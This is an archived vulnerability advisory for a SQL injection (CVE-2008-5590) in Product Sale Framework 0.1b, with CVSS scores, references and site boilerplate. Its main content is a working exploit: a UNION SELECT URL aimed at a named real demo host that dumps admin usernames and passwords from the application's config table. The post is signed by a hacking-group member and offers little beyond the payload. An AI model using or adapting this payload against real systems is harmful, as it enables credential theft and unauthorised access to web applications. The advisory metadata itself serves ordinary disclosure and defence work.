Product Sale Framework 0.1b (forum_topic_id) SQL Injection Vulnerability

2008.12.17

Credit: b3hz4d

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-5590

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

 +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
+ +
+ Product Sale Framework sql injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 06 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com
#####################################################
APPLICATION : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR : http://www.productsaleframework.com
DEMO (links) : http://www.productsaleframework.com
#####################################################
[+] vuln :
customer.forumtopic.php
vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
http://www.productsaleframework.com/
[+] Exploit :
Admin Username and Password:
http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
##########################################################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
##########################################################################################################

References:

http://www.securityfocus.com/bid/32672

http://www.milw0rm.com/exploits/7368

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Product Sale Framework 0.1b (forum_topic_id) SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.